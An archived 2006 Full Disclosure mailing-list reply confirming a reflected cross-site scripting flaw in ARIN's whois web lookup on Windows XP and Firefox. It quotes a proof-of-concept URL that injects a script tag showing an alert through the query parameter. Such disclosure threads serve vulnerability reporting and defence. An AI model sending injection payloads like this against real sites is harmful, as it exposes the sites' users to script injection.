Full Disclosure mailing list archives

Re: Re: Arin.net XSS

From: Paul Farrow <pfarrow () flamenetworks co uk>
Date: Mon, 06 Mar 2006 14:26:29 +0000

Confirmed: Windows XP Professional, SP1

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1)Gecko/20060111 Firefox/1.5.0.1


Dave Korn wrote:

Michael Holstein wrote:

Here's a link that will probably work under both browsers

http://ws.arin.net/whois/?queryinput=%3Cscript%3Ealert('666')%3C/script%3E

(Firefox 1.5.0.1 on Linux)

No match found for <script>alert('666')</script>.


  Works on 1.0.x, I got the popup!


    cheers,
      DaveK


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

Re: Arin.net XSS, (continued)
- Re: Arin.net XSS Dave Korn (Mar 03)
  - Re: Re: Arin.net XSS Alexander Hristov (Mar 03)
    - Re: Re: Arin.net XSS J u a n (Mar 03)
- Re: Arin.net XSS Steven (Mar 03)
  - Re: Arin.net XSS Simon Smith (Mar 03)
    - Re: Arin.net XSS Steven (Mar 03)
    - Re: Arin.net XSS Dave Korn (Mar 06)
    - RE: Arin.net XSS php0t (Mar 03)
    - Re: Arin.net XSS Michael Holstein (Mar 03)
    - Re: Arin.net XSS Dave Korn (Mar 06)
    - Re: Re: Arin.net XSS Paul Farrow (Mar 06)
- RE: Re: Arin.net XSS Terminal Entry (Mar 03)
  - Re: Re: Arin.net XSS Dave Korn (Mar 06)
  - Re: Re: Arin.net XSS Morning Wood (Mar 06)
- RE: Re: Arin.net XSS Steven Rakick (Mar 03)
- RE: Arin.net XSS Steven Rakick (Mar 03)